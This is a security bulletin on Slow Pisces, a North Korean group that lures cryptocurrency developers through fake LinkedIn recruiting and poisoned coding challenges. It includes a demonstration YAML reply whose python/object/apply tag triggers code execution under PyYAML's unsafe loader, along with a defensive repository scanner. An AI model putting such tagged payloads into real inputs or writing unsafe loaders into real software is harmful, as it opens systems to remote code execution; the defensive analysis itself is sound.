North Korean Hackers Exploit LinkedIn to Infect Crypto Developers with Infostealers
Summary:
The North Korean state-sponsored group known as Slow Pisces (also tracked as Jade Sleet, TraderTraitor or PUKCHONG) is running a targeted campaign against cryptocurrency developers, with the goal of generating revenue for the DPRK regime. The group has been linked to some of the largest cryptocurrency heists on record, including the $308 million theft from the Japanese exchange DMM Bitcoin in December 2024 and the suspected $1.5 billion theft from the Dubai-based platform Bybit in February 2025. The campaign relies on social engineering and precisely targeted malware delivery rather than on any exploit: the victim ends up running the attackers' code themselves.
Slow Pisces initiates contact on LinkedIn, posing as recruiters, and lures developers into completing a coding challenge. The challenge is described in a PDF and points to a GitHub repository containing an ordinary-looking Python or JavaScript project. The project works as advertised and pulls data from legitimate sources, but it also fetches from an attacker-controlled server, and it is that reply that delivers the first stage, RN Loader, once the victim runs the code. Mixing real and attacker-controlled sources helps the malicious request blend in with normal network activity.
In the Python variant the project hands the server's reply to PyYAML's yaml.load() with a loader other than SafeLoader. A YAML document can then carry python-object tags that the loader turns into function calls, so code executes without an eval(), a downloaded binary or anything written to disk, which is what lets it slip past common detection. The decoded stage, RN Loader, opens a command loop with the command-and-control server, sends basic host information and pulls follow-up payloads chosen for the victim's environment. The RN Stealer sample that was recovered targets macOS and collects detailed system data, including saved credentials, cloud configuration files and SSH keys. The attackers use this to decide whether to maintain access or shut the malware down; because it runs only in memory, it leaves minimal forensic evidence either way. The JavaScript variant follows the same structure: the fetched reply is passed into EJS template rendering, whose escapeFunction option allows attacker-supplied code to be compiled into the template. The full JavaScript payload has not been recovered, but it is believed to drop Base64-encoded scripts into hidden local directories and execute them.
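To make the Python-variant sink concrete, here is an added example (not code from the Unit 42 report or from the lure projects) of a constructed server reply handed to PyYAML: the tagged value executes under yaml.load with the unsafe Loader and is rejected by safe_load. The reply contents and the os.path.expanduser call are assumed stand-ins; the real reply carried RN Loader, and the same tag can name any importable callable.

```python
# Added example, not code from the Unit 42 report or from the Slow Pisces
# projects: a minimal stand-in for the Python-variant sink. A benign-looking
# helper fetches "market data" and hands the reply to PyYAML. The reply below
# is constructed for illustration; its tagged value calls a harmless function
# (os.path.expanduser), but the tag resolves any importable callable the
# same way, which is how the real reply delivered RN Loader.
import os
import yaml

# Constructed stand-in for the attacker server's reply. To a human reader it
# looks like a price feed with one odd key. !!python/object/apply:<name> tells
# PyYAML's unsafe loaders to import <name> and call it with the listed args.
C2_REPLY = """\
prices:
  BTC: 83000
  ETH: 1600
marker: !!python/object/apply:os.path.expanduser ["~/.ssh/id_rsa"]
"""

def parse_as_in_lure(text):
    """What the lure project does: yaml.load with the full (unsafe) Loader.
    yaml.FullLoader in PyYAML < 5.4 honours the same tag (CVE-2020-14343)."""
    return yaml.load(text, Loader=yaml.Loader)

def parse_hardened(text):
    """The fix: safe_load builds only plain Python types and raises on any
    python/* tag, so a reply can never become a function call."""
    return yaml.safe_load(text)

def vet_reply(text):
    """Classify a reply before anything consumes it: 'ok' for plain data,
    otherwise a message naming why it would be a code-execution sink."""
    try:
        parse_hardened(text)
    except yaml.constructor.ConstructorError as exc:
        return "reject: " + str(exc.problem)
    return "ok"

if __name__ == "__main__":
    # The "marker" value is a resolved filesystem path: the function ran.
    print(parse_as_in_lure(C2_REPLY)["marker"])
    print(vet_reply(C2_REPLY))
```

The point of vet_reply is that the check happens on the text, before any loader that honours tags sees it; in a real project the right fix is simply to replace yaml.load with yaml.safe_load everywhere untrusted input is parsed.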
Security Officer Comments:
The attackers validate targets before serving any payload: the attacker-controlled server checks the requester's IP address, geolocation and HTTP headers and serves nothing malicious to anyone who does not match, so a sandbox or researcher fetching the same URL sees only ordinary data. Their infrastructure mimics legitimate services, typically with hostnames prefixed api. or cdn. on lookalike domains. Palo Alto Networks has worked with GitHub and LinkedIn to disrupt the campaign by removing accounts and repositories involved in the operation. Recruiter impersonation and fake coding challenges are not new (other DPRK groups such as Alluring Pisces use similar lures), but Slow Pisces demonstrates a higher level of operational security: its payloads are memory-resident, delivered only to validated targets, and protected by multiple delivery layers. That makes detection and prevention far harder, especially for organizations operating in the cryptocurrency space.
IOCs:
https://unit42.paloaltonetworks.com/slow-pisces-new-custom-malware/
Suggested Corrections:
- Educate Developers – Warn against unsolicited job offers and "coding challenges" from unknown LinkedIn or GitHub contacts; a recruiter who needs you to run their repository is the tell.
- Block Unvetted Code Execution – Review external code before running it, and run it only in a throwaway VM or container that has no access to SSH keys, cloud credentials or wallets.
- Monitor Network and Memory Activity – Use EDR to catch in-memory execution and DNS/HTTPS inspection to catch beaconing to lookalike hosts (api. and cdn. prefixes on unfamiliar domains).
- Apply GitHub and LinkedIn Controls – Limit repository access, monitor for unusual forks, and report fake recruiter profiles.
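One way to act on the "review before running" correction, as an added example that is not from the Unit 42 report or from any Slow Pisces repository: a stdlib-only Python pass over a cloned challenge that flags the campaign's two sinks (yaml.load without SafeLoader, EJS render options taken from a variable) and the usual dynamic-code patterns. The sample files, hostnames and the .test domains it scans are constructed; the heuristics are assumptions about what a lure looks like, and an empty report does not prove a repository is safe.

```python
# Added example, not from the Unit 42 report or any Slow Pisces repository:
# a pre-execution vetting pass over a cloned "coding challenge" repository.
# It flags the two sinks this campaign used (PyYAML yaml.load() without
# SafeLoader; an EJS render whose options may come from the network) plus
# generic eval/exec/new Function/base64 patterns. Heuristic only.
import ast
import os
import re
import tempfile
import textwrap

# Regex heuristics for JavaScript. The escapeFunction string may only arrive
# in the server reply at runtime, so any render call taking its options from
# a variable is worth a manual look.
JS_PATTERNS = {
    "ejs.render: check where the options object comes from": re.compile(r"\bejs\.render\s*\("),
    "escapeFunction option: EJS code-injection vector": re.compile(r"\bescapeFunction\b"),
    "new Function(): dynamic code": re.compile(r"\bnew\s+Function\s*\("),
    "eval(): dynamic code": re.compile(r"\beval\s*\("),
    "base64 decode: check what consumes the output": re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]"),
}

def _callee(node):
    """Dotted name of a Call's callee, e.g. 'yaml.load' or 'exec'."""
    parts, f = [], node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))

def scan_python(src):
    """Return (lineno, message) pairs for suspicious calls in Python source."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if not isinstance(node, ast.Call):
            continue
        name = _callee(node)
        if name in ("yaml.load", "yaml.load_all", "yaml.unsafe_load", "yaml.full_load"):
            loaders = [ast.unparse(kw.value) for kw in node.keywords if kw.arg == "Loader"]
            loader = loaders[0] if loaders else "<default>"
            if "SafeLoader" not in loader:
                findings.append((node.lineno, f"{name} with Loader={loader}: non-Safe YAML loader"))
        elif name in ("eval", "exec") and node.args and not isinstance(node.args[0], ast.Constant):
            findings.append((node.lineno, f"{name} on a non-literal: dynamic code"))
        elif name in ("base64.b64decode", "marshal.loads", "pickle.loads"):
            findings.append((node.lineno, f"{name}: check what consumes the output"))
    return findings

def scan_js(src):
    """Line-based regex pass over JavaScript source."""
    return [(n, msg) for n, line in enumerate(src.splitlines(), 1)
            for msg, pat in JS_PATTERNS.items() if pat.search(line)]

def scan_repo(root):
    """Walk a checkout; map relative path -> findings (clean files omitted)."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            if fn.endswith(".py"):
                hits = scan_python(src)
            elif fn.endswith(".js"):
                hits = scan_js(src)
            else:
                continue
            if hits:
                report[os.path.relpath(path, root)] = hits
    return report

# Constructed sample repository (hypothetical file names and .test hosts).
# The Python file mirrors the lure's shape: real-looking APIs plus one extra
# host, reply fed to yaml.load. The JS file renders EJS with fetched options.
SAMPLE_FILES = {
    "fetch_prices.py": textwrap.dedent("""\
        import requests, yaml
        SOURCES = ["https://api.legit-exchange.test/quotes", "https://api.lookalike.test/v1/quotes"]
        def load_quotes():
            out = {}
            for url in SOURCES:
                out[url] = yaml.load(requests.get(url).text, Loader=yaml.Loader)
            return out
    """),
    "server.js": textwrap.dedent("""\
        const ejs = require("ejs");
        async function render(tpl, body) {
          const opts = JSON.parse(body);   // options come straight from the network
          return ejs.render(tpl, {}, opts);
        }
    """),
}

def build_sample_repo():
    """Write the constructed files to a temp dir so scan_repo has a tree to walk."""
    root = tempfile.mkdtemp(prefix="challenge-")
    for name, src in SAMPLE_FILES.items():
        with open(os.path.join(root, name), "w", encoding="utf-8") as fh:
            fh.write(src)
    return root

if __name__ == "__main__":
    for path, hits in scan_repo(build_sample_repo()).items():
        for lineno, message in hits:
            print(f"{path}:{lineno}: {message}")
```

Run it against the real clone with scan_repo("/path/to/clone") before executing anything; every hit is a line to read by hand, and a yaml.load hit or a render call fed from a network reply is reason enough to stop and ask the "recruiter" why the code needs it.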
Source
https://www.infosecurity-magazine.com/news/north-korea-hackers-linkedin/